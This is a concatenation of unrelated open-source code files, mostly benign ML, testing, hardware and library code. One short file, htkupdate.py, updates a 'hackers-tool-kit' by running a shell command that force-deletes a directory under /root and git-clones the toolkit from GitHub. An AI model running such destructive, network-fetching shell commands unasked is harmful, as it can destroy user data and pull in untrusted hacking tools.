shuffle=False)
eval_spec = tf.estimator.EvalSpec(input_fn = eval_input_fn)
if not RESUME_TRAINING:
print("Removing previous artifacts...")
shutil.rmtree(export_dir, ignore_errors=True)
else:
print("Resuming training...")
sys.stdout.flush()
tf.logging.set_verbosity(tf.logging.INFO)
estimator = create_estimator(run_config, hparams)
tf.estimator.train_and_evaluate(estimator=estimator, train_spec=train_spec, eval_spec=eval_spec)
estimator.export_savedmodel(export_dir, serving_input_receiver_fn)
export_generic_config(export_dir=export_dir)
'''
prediction, cost_func, train_op, input_placeholder, target_placeholder, graph, sample_weight_placeholder = build_graph(shifu_context=context)
session = tf.Session()
train(input_placeholder=input_placeholder, target_placeholder=target_placeholder, sample_weight_placeholder = sample_weight_placeholder, prediction=prediction,
cost_func=cost_func, train_op=train_op, input_features=input_features,
targets=targets, validate_input=validate_feature, validate_target=validate_target, session=session, context=context,
training_data_sample_weight=training_data_sample_weight, valid_data_sample_weight=valid_data_sample_weight)
'''
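# Hypothetical invocation sketch (this script is normally launched by Shifu itself). The flag
# names come from the argparse definitions above; the paths and values are placeholders:
#
#   python train_esitmator_distributed.py -inputdaatapath hdfs:///path/to/normalized/data \
#       -delimiter '|' -target 0 -validationrate 0.2 -hiddenlayernodes 30 20 \
#       -epochnums 100 -modelname model0 -weightcolumnnum -1 -learningRate 0.1 \
#       -lossfunc squared -optimizer adam -weightinitalizer xavier \
#       -actfuncs relu relu -minibatch 128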
|
src/curt/curt/modules/smarthome/base_provider.py
|
sanyaade-teachings/cep
| 108 |
102426
|
"""
Copyright (C) Cortic Technology Corp. - All Rights Reserved
Written by <NAME> <<EMAIL>>, 2021
"""
from abc import abstractmethod
class BaseProvider:
def __init__(self):
self.token = ""
@abstractmethod
def config_control_handler(self, params):
pass
def command(self, params):
data = params["ready_data"][0]
if data["control_type"] == "get_devices":
return self.get_devices(data)
elif data["control_type"] == "light":
return self.control_light(data)
elif data["control_type"] == "media_player":
return self.control_media_player(data)
@abstractmethod
def get_devices(self, data):
pass
@abstractmethod
def control_light(self, data):
pass
@abstractmethod
def control_media_player(self, data):
pass
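# Hypothetical subclass sketch (not part of the cep project): illustrates how command()
# dispatches on the "control_type" field of the first "ready_data" entry; these handlers
# only log and return placeholder results.
class EchoProvider(BaseProvider):
    def config_control_handler(self, params):
        print("configure:", params)

    def get_devices(self, data):
        return {"devices": []}

    def control_light(self, data):
        print("light:", data)
        return {"status": "ok"}

    def control_media_player(self, data):
        print("media_player:", data)
        return {"status": "ok"}


if __name__ == "__main__":
    provider = EchoProvider()
    print(provider.command({"ready_data": [{"control_type": "get_devices"}]}))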
|
gcompiler/python/delta_infer/subgraphs/__init__.py
|
didichuxing/delta
| 1,442 |
102466
|
from .transformer import *
from .common import *
#tf.compat.v1.disable_eager_execution()
#
#batch_size = 40
#seq_length = 200
#hidden_size = 768
#num_attention_heads =12
#size_per_head = int(hidden_size / num_attention_heads)
#
#layer_input = tf.compat.v1.placeholder(tf.float32, shape=(batch_size*seq_length, hidden_size))
## Tensor of shape [batch_size, from_seq_length, to_seq_length].
#attention_mask = tf.compat.v1.placeholder(tf.float32, shape=(batch_size, seq_length, seq_length))
#
#output_rnn = transformer_cell(input_tensor=layer_input,#tf.reshape(layer_input, [-1, hidden_size]),
# attention_mask=attention_mask,
# hidden_size=hidden_size,
# num_attention_heads=num_attention_heads,
# attention_head_size=size_per_head,
# batch_size = batch_size,
# seq_length = seq_length,
# intermediate_size=1280)
|
calvinextras/calvinsys/io/gpiopin/raspberry_pi/PIGPIOPin.py
|
gabrielcercel/calvin-base
| 334 |
102467
|
<reponame>gabrielcercel/calvin-base<filename>calvinextras/calvinsys/io/gpiopin/raspberry_pi/PIGPIOPin.py
# -*- coding: utf-8 -*-
# Copyright (c) 2015 Ericsson AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from calvinextras.calvinsys.io.gpiopin import BaseGPIOPin
from calvin.utilities.calvinlogger import get_logger
import pigpio
_log = get_logger(__name__)
class PIGPIOPin(BaseGPIOPin.BaseGPIOPin):
"""
    Calvinsys object handling a general-purpose input/output pin using the pigpio package
"""
PULL = {"up": pigpio.PUD_UP, "down": pigpio.PUD_DOWN, "off": pigpio.PUD_OFF}
MODE = {"in": pigpio.INPUT, "out": pigpio.OUTPUT}
EDGE = {"rising": pigpio.RISING_EDGE, "falling": pigpio.FALLING_EDGE, "both": pigpio.EITHER_EDGE}
def init(self, pin, direction, pull=None, edge=None, bouncetime=None, **kwargs):
self._values = []
self._pin = pin
self._direction = direction
self._debounce = 1000*bouncetime if bouncetime else None # bouncetime is ms, pigpio uses us
self._edge = edge
self._gpio = pigpio.pi()
self._cb = None
try :
mode = self.MODE[direction.lower()]
except KeyError:
raise Exception("Unknown direction '{}', should be IN, OUT".format(direction))
if mode == pigpio.INPUT:
try:
pud = self.PULL[pull.lower()] if pull else pigpio.PUD_OFF
except KeyError:
raise Exception("Unknown pull '{}', should be UP, DOWN, OFF".format(pull))
self._gpio.set_pull_up_down(pin, pud)
if self._debounce:
self._gpio.set_glitch_filter(pin, self._debounce)
self._gpio.set_mode(pin, mode)
if edge is not None:
try:
detect = self.EDGE[edge.lower()]
except KeyError:
raise Exception("Unknown edge '{}', should be RISING, FALLING, BOTH")
self._cb = self._gpio.callback(pin, detect, self._edge_cb)
def _edge_cb(self, pin, edge, tick):
if edge != 2:
self._values.append(edge)
self.scheduler_wakeup()
def can_write(self):
return self._direction.lower() == "out"
def write(self, value):
self._gpio.write(self._pin, 1 if value else 0)
def can_read(self):
if self._direction.lower() == 'in':
return bool(self._values)
return False
def read(self):
if self._values:
return self._values.pop(0)
else:
return self._gpio.read(self._pin)
def close(self):
if self._cb:
self._cb.cancel()
del self._gpio
self._gpio = None
|
dm_control/manipulation/shared/observations.py
|
h8907283/dm_control
| 2,863 |
102483
|
# Copyright 2018 The dm_control Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Shared configuration options for observations."""
import collections
import numpy as np
class ObservableSpec(collections.namedtuple(
'ObservableSpec',
['enabled', 'update_interval', 'buffer_size', 'delay', 'aggregator',
'corruptor'])):
"""Configuration options for generic observables."""
__slots__ = ()
class CameraObservableSpec(collections.namedtuple(
'CameraObservableSpec', ('height', 'width') + ObservableSpec._fields)):
"""Configuration options for camera observables."""
__slots__ = ()
class ObservationSettings(collections.namedtuple(
'ObservationSettings', ['proprio', 'ftt', 'prop_pose', 'camera'])):
"""Container of `ObservableSpecs` grouped by category."""
__slots__ = ()
class ObservableNames(collections.namedtuple(
'ObservableNames', ['proprio', 'ftt', 'prop_pose', 'camera'])):
"""Container that groups the names of observables by category."""
__slots__ = ()
def __new__(cls, proprio=(), ftt=(), prop_pose=(), camera=()):
return super(ObservableNames, cls).__new__(
cls, proprio=proprio, ftt=ftt, prop_pose=prop_pose, camera=camera)
# Global defaults for "feature" observables (i.e. anything that isn't a camera).
_DISABLED_FEATURE = ObservableSpec(
enabled=False,
update_interval=1,
buffer_size=1,
delay=0,
aggregator=None,
corruptor=None)
_ENABLED_FEATURE = _DISABLED_FEATURE._replace(enabled=True)
# Force, torque and touch-sensor readings are scaled using a symmetric
# logarithmic transformation that handles 0 and negative values.
_symlog1p = lambda x, random_state: np.sign(x) * np.log1p(abs(x))
_DISABLED_FTT = _DISABLED_FEATURE._replace(corruptor=_symlog1p)
_ENABLED_FTT = _ENABLED_FEATURE._replace(corruptor=_symlog1p)
# Global defaults for camera observables.
_DISABLED_CAMERA = CameraObservableSpec(
height=84,
width=84,
enabled=False,
update_interval=1,
buffer_size=1,
delay=0,
aggregator=None,
corruptor=None)
_ENABLED_CAMERA = _DISABLED_CAMERA._replace(enabled=True)
# Predefined sets of configurations options to apply to each category of
# observable.
PERFECT_FEATURES = ObservationSettings(
proprio=_ENABLED_FEATURE,
ftt=_ENABLED_FTT,
prop_pose=_ENABLED_FEATURE,
camera=_DISABLED_CAMERA)
VISION = ObservationSettings(
proprio=_ENABLED_FEATURE,
ftt=_ENABLED_FTT,
prop_pose=_DISABLED_FEATURE,
camera=_ENABLED_CAMERA)
JACO_ARM_OBSERVABLES = ObservableNames(
proprio=['joints_pos', 'joints_vel'], ftt=['joints_torque'])
JACO_HAND_OBSERVABLES = ObservableNames(
proprio=['joints_pos', 'joints_vel', 'pinch_site_pos', 'pinch_site_rmat'])
FREEPROP_OBSERVABLES = ObservableNames(
prop_pose=['position', 'orientation', 'linear_velocity',
'angular_velocity'])
def make_options(obs_settings, obs_names):
"""Constructs a dict of configuration options for a set of named observables.
Args:
obs_settings: An `ObservationSettings` instance.
obs_names: An `ObservableNames` instance.
Returns:
A nested dict containing `{observable_name: {option_name: value}}`.
"""
observable_options = {}
for category, spec in obs_settings._asdict().items():
for observable_name in getattr(obs_names, category):
observable_options[observable_name] = spec._asdict()
return observable_options
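# Hypothetical usage sketch (not part of dm_control): build per-observable option dicts for the
# Jaco arm under the predefined VISION settings; proprioceptive features come out enabled and
# force/torque/touch readings keep the symmetric-log corruptor.
if __name__ == '__main__':
    options = make_options(VISION, JACO_ARM_OBSERVABLES)
    print(options['joints_pos']['enabled'])        # True
    print(options['joints_torque']['corruptor'])   # the _symlog1p lambda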
|
pypy/module/pypyjit/test/test_pyframe.py
|
nanjekyejoannah/pypy
| 381 |
102547
|
import py
class TestJitTraceInteraction(object):
def test_trace_while_blackholing(self):
import sys
l = []
printed = []
def trace(frame, event, arg):
l.append((frame.f_code.co_name, event))
return trace
def g(i, x):
if i > x - 10:
printed.append(i)
if i == x - 5:
sys.settrace(trace)
def f(x):
res = 0
for i in range(x):
res += i
g(i, x)
f(10)
sys.settrace(None)
print printed
assert l == [('g', 'call'), ('g', 'line'), ('g', 'line'), ('g', 'line'), ('g', 'return')] * 4
l1 = l
l = []
printed = []
f(10000)
sys.settrace(None)
print printed
assert l == l1
|
PyObjCTest/test_nslock.py
|
Khan/pyobjc-framework-Cocoa
| 132 |
102633
|
<reponame>Khan/pyobjc-framework-Cocoa
from Foundation import *
import objc
from PyObjCTools.TestSupport import *
class TestNSLockProtocols (TestCase):
def testLockIsLock(self):
# Test for bug #1735937
lock = NSLock.alloc().init()
self.assert_(lock.conformsToProtocol_(objc.protocolNamed("NSLocking")))
self.assert_(lock.conformsToProtocol_(protocols.NSLocking))
def testMethods(self):
self.assertResultIsBOOL(NSLock.tryLock)
self.assertResultIsBOOL(NSLock.lockBeforeDate_)
self.assertResultIsBOOL(NSConditionLock.tryLock)
self.assertResultIsBOOL(NSConditionLock.tryLockWhenCondition_)
self.assertResultIsBOOL(NSConditionLock.lockBeforeDate_)
self.assertResultIsBOOL(NSConditionLock.lockWhenCondition_beforeDate_)
self.assertResultIsBOOL(NSRecursiveLock.tryLock)
self.assertResultIsBOOL(NSRecursiveLock.lockBeforeDate_)
self.assertResultIsBOOL(NSCondition.waitUntilDate_)
if __name__ == "__main__":
main()
|
compiler_opt/rl/random_net_distillation_test.py
|
google/ml-compiler-opt
| 130 |
102657
|
# coding=utf-8
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for random_network_distillation."""
from absl.testing import parameterized
import tensorflow as tf
from tf_agents.networks import encoding_network
from tf_agents.networks import expand_dims_layer
from tf_agents.trajectories import time_step
from tf_agents.trajectories import trajectory
from compiler_opt.rl import random_net_distillation
def _processing_layer_creator():
expand_dims_op = expand_dims_layer.ExpandDims(-1)
def observation_processing_layer(_):
"""Creates the toy layer to process observation."""
def discard_feature(obs):
expanded_obs = expand_dims_op(obs)
return tf.ones_like(expanded_obs, dtype=tf.float32)
func = discard_feature
return tf.keras.layers.Lambda(func)
return observation_processing_layer
def _create_test_data(batch_size, sequence_length):
test_trajectory = trajectory.Trajectory(
step_type=tf.fill([batch_size, sequence_length], 1),
observation={
'edge_count':
tf.fill([batch_size, sequence_length],
tf.constant(10, dtype=tf.int64))
},
action=tf.fill([batch_size, sequence_length],
tf.constant(1, dtype=tf.int64)),
policy_info=(),
next_step_type=tf.fill([batch_size, sequence_length], 1),
reward=tf.fill([batch_size, sequence_length], 2.0),
discount=tf.fill([batch_size, sequence_length], 1.0),
)
def test_data_iterator():
while True:
yield test_trajectory
return test_data_iterator()
class RandomNetworkDistillationTest(tf.test.TestCase, parameterized.TestCase):
def setUp(self):
super(RandomNetworkDistillationTest, self).setUp()
self._update_frequency = 1
observation_spec = {
'edge_count': tf.TensorSpec(
dtype=tf.int64, shape=(), name='edge_count')
}
self._time_step_spec = time_step.time_step_spec(observation_spec)
def test_train_on_batch(self):
data_iterator = _create_test_data(batch_size=3, sequence_length=3)
# initialize the random_network_distillation instance
random_network_distillation = random_net_distillation.RandomNetworkDistillation(
time_step_spec=self._time_step_spec,
preprocessing_layer_creator=_processing_layer_creator(),
encoding_network=encoding_network.EncodingNetwork,
update_frequency=self._update_frequency)
experience = next(data_iterator)
# test the RND train function return type
for _ in range(5):
new_experience = random_network_distillation.train(experience)
self.assertIsInstance(new_experience, trajectory.Trajectory)
# the rest of experience should remain the same except reward
self.assertAllEqual(experience.step_type, new_experience.step_type)
self.assertAllEqual(experience.observation, new_experience.observation)
self.assertAllEqual(experience.action, new_experience.action)
self.assertAllEqual(experience.policy_info, new_experience.policy_info)
self.assertAllEqual(experience.next_step_type, experience.next_step_type)
self.assertAllEqual(experience.discount, new_experience.discount)
# reward should have same shape
self.assertAllEqual(experience.reward.shape, new_experience.reward.shape)
      # new reward should have a finite value
self.assertFalse(tf.math.is_inf(tf.reduce_sum(new_experience.reward)))
if __name__ == '__main__':
tf.test.main()
|
nativedroid/nativedroid/analyses/resolver/jni/java_type/primitive.py
|
CherishAZ/Argus-SAF
| 152 |
102666
|
<filename>nativedroid/nativedroid/analyses/resolver/jni/java_type/primitive.py<gh_stars>100-1000
from nativedroid.analyses.resolver.jni.jtype import JType
__author__ = "<NAME>, <NAME>"
__copyright__ = "Copyright 2018, The Argus-SAF Project"
__license__ = "Apache v2.0"
class JBoolean(JType):
def __init__(self, project):
super(JBoolean, self).__init__(project, 'jboolean', 1)
class JByte(JType):
def __init__(self, project):
super(JByte, self).__init__(project, 'jbyte', 1)
class JChar(JType):
def __init__(self, project):
super(JChar, self).__init__(project, 'jchar', 2)
class JShort(JType):
def __init__(self, project):
super(JShort, self).__init__(project, 'jshort', 2)
class JInt(JType):
def __init__(self, project):
super(JInt, self).__init__(project, 'jint', 4)
class JLong(JType):
def __init__(self, project):
super(JLong, self).__init__(project, 'jlong', 8)
class JFloat(JType):
def __init__(self, project):
super(JFloat, self).__init__(project, 'jfloat', 4)
class JDouble(JType):
def __init__(self, project):
super(JDouble, self).__init__(project, 'jdouble', 8)
class Void(JType):
def __init__(self, project):
super(Void, self).__init__(project, 'void')
|
release/stubs.min/System/Runtime/InteropServices/__init___parts/FieldOffsetAttribute.py
|
htlcnn/ironpython-stubs
| 182 |
102668
|
<filename>release/stubs.min/System/Runtime/InteropServices/__init___parts/FieldOffsetAttribute.py<gh_stars>100-1000
class FieldOffsetAttribute(Attribute,_Attribute):
"""
Indicates the physical position of fields within the unmanaged representation of a class or structure.
FieldOffsetAttribute(offset: int)
"""
def __init__(self,*args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
@staticmethod
def __new__(self,offset):
""" __new__(cls: type,offset: int) """
pass
Value=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the offset from the beginning of the structure to the beginning of the field.
Get: Value(self: FieldOffsetAttribute) -> int
"""
|
desktop/core/ext-py/pytidylib-0.3.2/tests/test_docs.py
|
kokosing/hue
| 5,079 |
102682
|
# -*- coding: utf-8 -*-
# Copyright 2009-2014 <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from __future__ import unicode_literals
import unittest
from tidylib import Tidy, PersistentTidy, tidy_document
DOC = u'''<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html>
<head>
<title></title>
</head>
<body>
%s
</body>
</html>
'''
class TestDocs1(unittest.TestCase):
""" Test some sample documents """
def test_p_element_closed(self):
h = "<p>hello"
expected = DOC % '''<p>\n hello\n </p>'''
doc, err = tidy_document(h)
self.assertEqual(doc, expected)
def test_alt_added_to_img(self):
h = "<img src='foo'>"
expected = DOC % '''<img src='foo' alt="bar">'''
doc, err = tidy_document(h, {'alt-text': 'bar'})
self.assertEqual(doc, expected)
def test_entity_preserved_using_bytes(self):
h = b"é"
expected = (DOC % "é").encode('utf-8')
doc, err = tidy_document(h, {'preserve-entities': 1})
self.assertEqual(doc, expected)
def test_numeric_entities_using_bytes(self):
h = b"é"
expected = (DOC % "é").encode('utf-8')
doc, err = tidy_document(h, {'numeric-entities': 1, 'output-encoding': 'ascii'})
self.assertEqual(doc, expected)
def test_non_ascii_preserved(self):
h = u"unicode string ß"
expected = DOC % h
doc, err = tidy_document(h)
self.assertEqual(doc, expected)
def test_large_document(self):
h = u"A" * 10000
expected = DOC % h
doc, err = tidy_document(h)
self.assertEqual(doc, expected)
def test_can_use_two_tidy_instances(self):
t1 = Tidy()
t2 = Tidy()
self.assertEqual(t1.tidy_document(DOC % 'a')[0], DOC % 'a')
self.assertEqual(t2.tidy_document(DOC % 'b')[0], DOC % 'b')
def test_tidy_doesnt_persist_options(self):
tidy = Tidy()
# This option makes it a fragment
doc, err = tidy.tidy_document(DOC % 'a', {'show-body-only': 1})
self.assertEqual(doc, 'a\n')
doc, err = tidy.tidy_document(DOC % 'a')
self.assertEqual(doc, DOC % 'a')
def test_persistent_tidy_does_persist_options(self):
tidy = PersistentTidy()
# This option makes it a fragment
doc, err = tidy.tidy_document(DOC % 'a', {'show-body-only': 1})
self.assertEqual(doc, 'a\n')
doc, err = tidy.tidy_document(DOC % 'a')
self.assertEqual(doc, 'a\n')
def test_xmlns_large_document_xml_corner_case(self):
# Test for a super weird edge case in Tidy that can cause it to return
# the wrong required buffer size.
body = '<span><span>A</span></span>' + 'A' * 7937
html = '<html xmlns="http://www.w3.org/1999/xhtml">' + body
doc, err = tidy_document(html, {'output-xml': 1})
self.assertEqual(doc.strip()[-7:], "</html>")
if __name__ == '__main__':
unittest.main()
|
qiskit_optimization/converters/flip_problem_sense.py
|
X-Libor/qiskit-optimization
| 109 |
102723
|
# This code is part of Qiskit.
#
# (C) Copyright IBM 2021.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""Converters to flip problem sense, e.g. maximization to minimization and vice versa."""
import copy
from typing import Optional, List, Union
import numpy as np
from .quadratic_program_converter import QuadraticProgramConverter
from ..exceptions import QiskitOptimizationError
from ..problems.quadratic_objective import ObjSense
from ..problems.quadratic_program import QuadraticProgram
class _FlipProblemSense(QuadraticProgramConverter):
"""Flip the sense of a problem, e.g. converts from maximization to minimization and
vice versa, regardless of the current sense."""
def __init__(self) -> None:
self._src_num_vars: Optional[int] = None
def convert(self, problem: QuadraticProgram) -> QuadraticProgram:
"""Flip the sense of a problem.
Args:
problem: The problem to be flipped.
Returns:
A converted problem, that has the flipped sense.
"""
# copy original number of variables as reference.
self._src_num_vars = problem.get_num_vars()
desired_sense = self._get_desired_sense(problem)
# flip the problem sense
if problem.objective.sense != desired_sense:
desired_problem = copy.deepcopy(problem)
desired_problem.objective.sense = desired_sense
desired_problem.objective.constant = (-1) * problem.objective.constant
desired_problem.objective.linear = (-1) * problem.objective.linear.coefficients
desired_problem.objective.quadratic = (-1) * problem.objective.quadratic.coefficients
else:
desired_problem = problem
return desired_problem
def _get_desired_sense(self, problem: QuadraticProgram) -> ObjSense:
"""
        Computes the desired sense of the problem. By default, the sense is flipped.
Args:
problem: a problem to check
Returns:
A desired sense, if the problem was a minimization problem, then the sense is
maximization and vice versa.
"""
if problem.objective.sense == ObjSense.MAXIMIZE:
return ObjSense.MINIMIZE
else:
return ObjSense.MAXIMIZE
def interpret(self, x: Union[np.ndarray, List[float]]) -> np.ndarray:
"""Convert the result of the converted problem back to that of the original problem.
Args:
x: The result of the converted problem or the given result in case of FAILURE.
Returns:
The result of the original problem.
Raises:
QiskitOptimizationError: if the number of variables in the result differs from
that of the original problem.
"""
if len(x) != self._src_num_vars:
raise QiskitOptimizationError(
f"The number of variables in the passed result differs from "
f"that of the original problem, should be {self._src_num_vars}, but got {len(x)}."
)
return np.asarray(x)
class MaximizeToMinimize(_FlipProblemSense):
"""Convert a maximization problem to a minimization problem only if it is a maximization
    problem; otherwise the problem's sense is unchanged."""
def _get_desired_sense(self, problem: QuadraticProgram) -> ObjSense:
return ObjSense.MINIMIZE
class MinimizeToMaximize(_FlipProblemSense):
"""Convert a minimization problem to a maximization problem only if it is a minimization
    problem; otherwise the problem's sense is unchanged."""
def _get_desired_sense(self, problem: QuadraticProgram) -> ObjSense:
return ObjSense.MAXIMIZE
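# Hypothetical usage sketch (not part of Qiskit's module): flip a tiny maximization problem to
# minimization and map a candidate solution back; the variable name "x" and the coefficients
# are placeholders.
if __name__ == "__main__":
    program = QuadraticProgram()
    program.binary_var("x")
    program.maximize(constant=1.0, linear={"x": 2.0})

    converter = MaximizeToMinimize()
    minimized = converter.convert(program)   # objective becomes: minimize -2*x - 1
    print(converter.interpret([1.0]))        # variable values pass through unchanged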
|
htkupdate.py
|
otherbeast/hackers-tool-kit
| 393 |
102730
|
import os
print "UPDATING..."
os.system("cd")
os.system('cd /root/ && rm -fr hackers-tool-kit && git clone https://github.com/unkn0wnh4ckr/hackers-tool-kit && echo "[UPDATED]: Restart Your Terminal"')
|
patreonmanager/apps.py
|
crydotsnake/djangogirls
| 446 |
102731
|
from django.apps import AppConfig
from django.utils.translation import gettext_lazy as _
class PatreonManagerConfig(AppConfig):
name = 'patreonmanager'
verbose_name = _("Patreon Manager")
|
cupcake2/ice2/create_seed.py
|
ArthurDondi/cDNA_Cupcake
| 205 |
102794
|
__author__ = 'lachesis'
import os, sys
from Bio import SeqIO
from cupcake.io.SeqReaders import LazyFastaReader
from cupcake2.io.FileIO import write_seqids_to_fasta
input = 'isoseq_flnc.fasta'
NUM_SEQS_PER_BATCH = 50000
d = LazyFastaReader(input)
lens = [(r.id, len(r.seq)) for r in SeqIO.parse(open(input), 'fasta')]
lens.sort(key=lambda x: x[1], reverse=True)
n = len(lens)
# start at 1% of the data
starting_seed_index = n * 1 // 100  # integer (floor) division so the index can be used for slicing
good = [x[0] for x in lens[starting_seed_index:starting_seed_index+NUM_SEQS_PER_BATCH]]
write_seqids_to_fasta(good, 'seed0.fasta', d)
batch_index = 1
starting_index = starting_seed_index+NUM_SEQS_PER_BATCH
while starting_index < n:
write_seqids_to_fasta([x[0] for x in lens[starting_index:starting_index+NUM_SEQS_PER_BATCH]], \
"batch{0}.fasta".format(batch_index), d)
starting_index += NUM_SEQS_PER_BATCH
batch_index += 1
write_seqids_to_fasta([x[0] for x in lens[:starting_seed_index]], "batch{0}.fasta".format(batch_index), d)
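# A small self-contained sketch of the index arithmetic above (illustrative; the tiny
# sizes stand in for the real number of sequences and NUM_SEQS_PER_BATCH):
def _demo_batch_split(n=250, batch_size=60):
    seed_start = n // 100                  # skip the longest 1% of sequences
    seed = list(range(seed_start, seed_start + batch_size))
    batches, start = [], seed_start + batch_size
    while start < n:
        batches.append(list(range(start, min(start + batch_size, n))))
        start += batch_size
    leftover = list(range(0, seed_start))  # the skipped top 1% goes into the final batch
    return seed, batches, leftover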
|
buildscripts/__init__.py
|
EshaMaharishi/pubsub-1
| 324 |
102848
|
import os
def findHacks(un):
    return None
|
tests/custom_cluster/test_compact_catalog_updates.py
|
Keendata/impala
| 746 |
102864
|
<filename>tests/custom_cluster/test_compact_catalog_updates.py
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
# Test Catalog behavior when --compact_catalog_topic is false.
import pytest
from tests.common.custom_cluster_test_suite import CustomClusterTestSuite
class TestCompactCatalogUpdates(CustomClusterTestSuite):
@classmethod
def get_workload(cls):
return 'functional-query'
@classmethod
def setup_class(cls):
if cls.exploration_strategy() != 'exhaustive':
pytest.skip('runs only in exhaustive')
super(TestCompactCatalogUpdates, cls).setup_class()
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(impalad_args="--compact_catalog_topic=false",
catalogd_args="--compact_catalog_topic=false")
def test_non_compact_catalog_topic_updates(self):
"""Start Impala cluster with compact catalog update topics disabled and run a set
of smoke tests to verify that catalog updates are received properly."""
try:
      # Check that the initial catalog update topic has been received
impalad1 = self.cluster.impalads[0]
assert impalad1.service.get_metric_value("catalog.num-tables") > 0
impalad2 = self.cluster.impalads[1]
assert impalad2.service.get_metric_value("catalog.num-tables") > 0
client1 = impalad1.service.create_beeswax_client()
client2 = impalad2.service.create_beeswax_client()
query_options = {"sync_ddl" : 1}
self.execute_query_expect_success(client1, "refresh functional.alltypes",
query_options)
result = client2.execute("select count(*) from functional.alltypes")
assert result.data[0] == "7300"
self.execute_query_expect_success(client1, "invalidate metadata", query_options)
self.execute_query_expect_success(client2, "show databases")
assert impalad1.service.get_metric_value("catalog.num-databases") > 0
assert impalad2.service.get_metric_value("catalog.num-databases") > 0
finally:
client1.close()
client2.close()
|
AutoDL Design/autodl.py
|
houj04/AutoDL
| 155 |
102880
|
<gh_stars>100-1000
#!/usr/bin/env python
# -*- coding:utf-8 -*-
# Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserve.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
AutoDL definition
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import sys
import argparse
import numpy as np
import subprocess
import paddle.fluid as fluid
from reinforce_policy_gradient import ReinforcePolicyGradient
from policy_model import PolicyModel
from autodl_agent import AutoDLAgent
import utils
import collections
class AutoDL(object):
"""
AutoDL class
"""
def __init__(self):
"""
init
"""
self.parse_args = self._init_parser()
self.bl_decay = self.parse_args.bl_decay
self.log_dir = self.parse_args.log_dir
self.early_stop = self.parse_args.early_stop
self.data_path = self.parse_args.data_path
self.num_models = self.parse_args.num_models
self.batch_size = self.parse_args.batch_size
        self.chunk_size = self.parse_args.chunk_size
self._init_dir_path()
self.model = PolicyModel(self.parse_args)
algo_hyperparas = {'lr': self.parse_args.learning_rate}
self.algorithm = ReinforcePolicyGradient(self.model,
hyperparas=algo_hyperparas)
self.autodl_agent = AutoDLAgent(self.algorithm, self.parse_args)
self.total_reward = 0
def _init_dir_path(self):
"""
init dir path
"""
utils.prepare(self.log_dir)
utils.prepare(self.log_dir, "actions")
utils.prepare(self.log_dir, "rewards")
utils.prepare(self.log_dir, "checkpoints")
def _init_parser(self):
"""
init parser
"""
parser = argparse.ArgumentParser(description='AutoDL Parser',
prog='AutoDL')
parser.add_argument('-v', '--version', action='version',
version='%(prog)s 0.1')
parser.add_argument('--num_nodes', dest="num_nodes", nargs="?",
